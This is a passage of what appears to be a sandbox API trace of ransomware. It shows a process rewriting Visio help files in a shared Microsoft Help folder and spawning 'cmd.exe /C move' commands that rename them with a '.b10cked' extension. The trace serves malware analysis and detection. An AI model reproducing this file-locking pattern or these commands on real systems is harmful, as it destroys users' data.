dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.464] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.466] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.466] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.466] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.472] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.472] CloseHandle (hObject=0x120) returned 1 [0199.473] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN") returned 0x27 [0199.474] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.475] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe78, dwThreadId=0xddc)) returned 1 [0199.490] CloseHandle (hObject=0x1b4) returned 1 [0199.490] CloseHandle (hObject=0x120) returned 1 [0199.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.490] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25628001662) returned 1 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x188 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.493] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.494] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=-195, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc5 [0199.494] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=-195, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc5 [0199.494] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xc3, lpOverlapped=0x0) returned 1 [0199.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0199.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x132f75c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.SHAPESHEET.14.1033.hxn", lpUsedDefaultChar=0x0) returned 31 [0199.499] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x188 [0199.499] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.499] CloseHandle (hObject=0x120) returned 1 [0199.500] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN") returned 0x27 [0199.501] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.501] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd90, dwThreadId=0xd4c)) returned 1 [0199.569] CloseHandle (hObject=0x1b4) returned 1 [0199.569] CloseHandle (hObject=0x120) returned 1 [0199.569] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.569] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.569] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.569] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.569] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.570] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25636088559) returned 1 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.573] 